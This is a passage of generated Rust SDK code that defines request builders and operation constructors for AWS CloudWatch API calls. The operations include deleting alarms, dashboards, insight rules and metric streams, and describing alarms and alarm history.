#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub fn build(
self,
) -> std::result::Result<crate::input::DeleteAlarmsInput, smithy_http::operation::BuildError>
{
Ok(crate::input::DeleteAlarmsInput {
alarm_names: self.alarm_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteAlarmsInputOperationOutputAlias = crate::operation::DeleteAlarms;
#[doc(hidden)]
pub type DeleteAlarmsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteAlarmsInput {
/// Consumes the builder and constructs an Operation<[`DeleteAlarms`](crate::operation::DeleteAlarms)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteAlarms,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_delete_alarms(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteAlarms::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteAlarms",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteAlarmsInput`](crate::input::DeleteAlarmsInput)
pub fn builder() -> crate::input::delete_alarms_input::Builder {
crate::input::delete_alarms_input::Builder::default()
}
}
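// Illustrative usage (a sketch; the alarm name and surrounding setup are
// assumptions, not part of the generated file):
//
//     let input = crate::input::DeleteAlarmsInput::builder()
//         .alarm_names("my-alarm")
//         .build()?;
//     let op = input.make_operation(&config)?;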
/// See [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub mod delete_anomaly_detector_input {
/// A builder for [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) stat: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The namespace associated with the anomaly detection model to delete.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The metric name associated with the anomaly detection model to delete.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The statistic associated with the anomaly detection model to delete.</p>
pub fn stat(mut self, input: impl Into<std::string::String>) -> Self {
self.stat = Some(input.into());
self
}
pub fn set_stat(mut self, input: std::option::Option<std::string::String>) -> Self {
self.stat = input;
self
}
/// Consumes the builder and constructs a [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteAnomalyDetectorInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteAnomalyDetectorInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
stat: self.stat,
})
}
}
}
#[doc(hidden)]
pub type DeleteAnomalyDetectorInputOperationOutputAlias = crate::operation::DeleteAnomalyDetector;
#[doc(hidden)]
pub type DeleteAnomalyDetectorInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteAnomalyDetectorInput {
/// Consumes the builder and constructs an Operation<[`DeleteAnomalyDetector`](crate::operation::DeleteAnomalyDetector)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteAnomalyDetector,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_anomaly_detector(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteAnomalyDetector::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteAnomalyDetector",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteAnomalyDetectorInput`](crate::input::DeleteAnomalyDetectorInput)
pub fn builder() -> crate::input::delete_anomaly_detector_input::Builder {
crate::input::delete_anomaly_detector_input::Builder::default()
}
}
/// See [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub mod delete_dashboards_input {
/// A builder for [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn dashboard_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.dashboard_names.unwrap_or_default();
v.push(input.into());
self.dashboard_names = Some(v);
self
}
pub fn set_dashboard_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.dashboard_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteDashboardsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteDashboardsInput {
dashboard_names: self.dashboard_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteDashboardsInputOperationOutputAlias = crate::operation::DeleteDashboards;
#[doc(hidden)]
pub type DeleteDashboardsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteDashboardsInput {
/// Consumes the builder and constructs an Operation<[`DeleteDashboards`](crate::operation::DeleteDashboards)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteDashboards,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_dashboards(&self).map_err(
|err| smithy_http::operation::BuildError::SerializationError(err.into()),
)?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteDashboards::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteDashboards",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteDashboardsInput`](crate::input::DeleteDashboardsInput)
pub fn builder() -> crate::input::delete_dashboards_input::Builder {
crate::input::delete_dashboards_input::Builder::default()
}
}
/// See [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub mod delete_insight_rules_input {
/// A builder for [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_names: std::option::Option<std::vec::Vec<std::string::String>>,
}
impl Builder {
pub fn rule_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.rule_names.unwrap_or_default();
v.push(input.into());
self.rule_names = Some(v);
self
}
pub fn set_rule_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.rule_names = input;
self
}
/// Consumes the builder and constructs a [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteInsightRulesInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteInsightRulesInput {
rule_names: self.rule_names,
})
}
}
}
#[doc(hidden)]
pub type DeleteInsightRulesInputOperationOutputAlias = crate::operation::DeleteInsightRules;
#[doc(hidden)]
pub type DeleteInsightRulesInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteInsightRulesInput {
/// Consumes the builder and constructs an Operation<[`DeleteInsightRules`](crate::operation::DeleteInsightRules)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteInsightRules,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_insight_rules(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteInsightRules::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteInsightRules",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteInsightRulesInput`](crate::input::DeleteInsightRulesInput)
pub fn builder() -> crate::input::delete_insight_rules_input::Builder {
crate::input::delete_insight_rules_input::Builder::default()
}
}
/// See [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub mod delete_metric_stream_input {
/// A builder for [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) name: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the metric stream to delete.</p>
pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
self.name = Some(input.into());
self
}
pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.name = input;
self
}
/// Consumes the builder and constructs a [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DeleteMetricStreamInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DeleteMetricStreamInput { name: self.name })
}
}
}
#[doc(hidden)]
pub type DeleteMetricStreamInputOperationOutputAlias = crate::operation::DeleteMetricStream;
#[doc(hidden)]
pub type DeleteMetricStreamInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DeleteMetricStreamInput {
/// Consumes the builder and constructs an Operation<[`DeleteMetricStream`](crate::operation::DeleteMetricStream)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DeleteMetricStream,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_delete_metric_stream(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DeleteMetricStream::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DeleteMetricStream",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DeleteMetricStreamInput`](crate::input::DeleteMetricStreamInput)
pub fn builder() -> crate::input::delete_metric_stream_input::Builder {
crate::input::delete_metric_stream_input::Builder::default()
}
}
/// See [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub mod describe_alarm_history_input {
/// A builder for [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
pub(crate) history_item_type: std::option::Option<crate::model::HistoryItemType>,
pub(crate) start_date: std::option::Option<smithy_types::Instant>,
pub(crate) end_date: std::option::Option<smithy_types::Instant>,
pub(crate) max_records: std::option::Option<i32>,
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) scan_by: std::option::Option<crate::model::ScanBy>,
}
impl Builder {
/// <p>The name of the alarm.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
pub fn alarm_types(mut self, input: impl Into<crate::model::AlarmType>) -> Self {
let mut v = self.alarm_types.unwrap_or_default();
v.push(input.into());
self.alarm_types = Some(v);
self
}
pub fn set_alarm_types(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
) -> Self {
self.alarm_types = input;
self
}
/// <p>The type of alarm histories to retrieve.</p>
pub fn history_item_type(mut self, input: crate::model::HistoryItemType) -> Self {
self.history_item_type = Some(input);
self
}
pub fn set_history_item_type(
mut self,
input: std::option::Option<crate::model::HistoryItemType>,
) -> Self {
self.history_item_type = input;
self
}
/// <p>The starting date to retrieve alarm history.</p>
pub fn start_date(mut self, input: smithy_types::Instant) -> Self {
self.start_date = Some(input);
self
}
pub fn set_start_date(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.start_date = input;
self
}
/// <p>The ending date to retrieve alarm history.</p>
pub fn end_date(mut self, input: smithy_types::Instant) -> Self {
self.end_date = Some(input);
self
}
pub fn set_end_date(mut self, input: std::option::Option<smithy_types::Instant>) -> Self {
self.end_date = input;
self
}
/// <p>The maximum number of alarm history records to retrieve.</p>
pub fn max_records(mut self, input: i32) -> Self {
self.max_records = Some(input);
self
}
pub fn set_max_records(mut self, input: std::option::Option<i32>) -> Self {
self.max_records = input;
self
}
/// <p>The token returned by a previous call to indicate that there is more data
/// available.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
        /// <p>Specifies whether to return the newest or oldest alarm history first. Specify <code>TimestampDescending</code> to have the newest
/// event history returned first, and specify <code>TimestampAscending</code> to have the oldest history returned first.</p>
pub fn scan_by(mut self, input: crate::model::ScanBy) -> Self {
self.scan_by = Some(input);
self
}
pub fn set_scan_by(mut self, input: std::option::Option<crate::model::ScanBy>) -> Self {
self.scan_by = input;
self
}
/// Consumes the builder and constructs a [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::DescribeAlarmHistoryInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::DescribeAlarmHistoryInput {
alarm_name: self.alarm_name,
alarm_types: self.alarm_types,
history_item_type: self.history_item_type,
start_date: self.start_date,
end_date: self.end_date,
max_records: self.max_records,
next_token: self.next_token,
scan_by: self.scan_by,
})
}
}
}
#[doc(hidden)]
pub type DescribeAlarmHistoryInputOperationOutputAlias = crate::operation::DescribeAlarmHistory;
#[doc(hidden)]
pub type DescribeAlarmHistoryInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl DescribeAlarmHistoryInput {
/// Consumes the builder and constructs an Operation<[`DescribeAlarmHistory`](crate::operation::DescribeAlarmHistory)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::DescribeAlarmHistory,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_describe_alarm_history(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::DescribeAlarmHistory::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"DescribeAlarmHistory",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`DescribeAlarmHistoryInput`](crate::input::DescribeAlarmHistoryInput)
pub fn builder() -> crate::input::describe_alarm_history_input::Builder {
crate::input::describe_alarm_history_input::Builder::default()
}
}
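// Illustrative usage (a sketch; the field values and the ScanBy variant name
// are assumptions):
//
//     let input = crate::input::DescribeAlarmHistoryInput::builder()
//         .alarm_name("my-alarm")
//         .scan_by(crate::model::ScanBy::TimestampDescending)
//         .max_records(50)
//         .build()?;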
/// See [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
pub mod describe_alarms_input {
/// A builder for [`DescribeAlarmsInput`](crate::input::DescribeAlarmsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) alarm_names: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_name_prefix: std::option::Option<std::string::String>,
pub(crate) alarm_types: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
pub(crate) children_of_alarm_name: std::option::Option<std::string::String>,
pub(crate) parents_of_alarm_name: std::option::Option<std::string::String>,
pub(crate) state_value: std::option::Option<crate::model::StateValue>,
pub(crate) action_prefix: std::option::Option<std::string::String>,
pub(crate) max_records: std::option::Option<i32>,
pub(crate) next_token: std::option::Option<std::string::String>,
}
impl Builder {
pub fn alarm_names(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_names.unwrap_or_default();
v.push(input.into());
self.alarm_names = Some(v);
self
}
pub fn set_alarm_names(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_names = input;
self
}
/// <p>An alarm name prefix. If you specify this parameter, you receive information about all alarms that have names
/// that start with this prefix.</p>
/// <p>If this parameter
/// is specified, you cannot specify <code>AlarmNames</code>.</p>
pub fn alarm_name_prefix(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name_prefix = Some(input.into());
self
}
pub fn set_alarm_name_prefix(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_name_prefix = input;
self
}
pub fn alarm_types(mut self, input: impl Into<crate::model::AlarmType>) -> Self {
let mut v = self.alarm_types.unwrap_or_default();
v.push(input.into());
self.alarm_types = Some(v);
self
}
pub fn set_alarm_types(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::AlarmType>>,
) -> Self {
self.alarm_types = input;
self
}
/// <p>If you use this parameter and specify the name of a composite alarm, the operation returns
/// information about the "children" alarms
/// of the alarm you specify. These are the metric alarms and composite alarms referenced in the
/// <code>AlarmRule</code> field of the composite alarm that you specify in
/// <code>ChildrenOfAlarmName</code>. Information about the composite alarm that you name in
/// <code>ChildrenOfAlarmName</code> is not returned.</p>
/// <p>If you specify <code>ChildrenOfAlarmName</code>, you cannot specify any other parameters in the request except
/// for <code>MaxRecords</code> and <code>NextToken</code>. If you do so, you
/// receive a validation
/// error.</p>
/// <note>
/// <p>Only the <code>Alarm Name</code>, <code>ARN</code>, <code>StateValue</code> (OK/ALARM/INSUFFICIENT_DATA), and <code>StateUpdatedTimestamp</code>
/// information are returned by this operation
/// when you use this parameter. To get complete information about
/// these alarms, perform another <code>DescribeAlarms</code> operation and specify
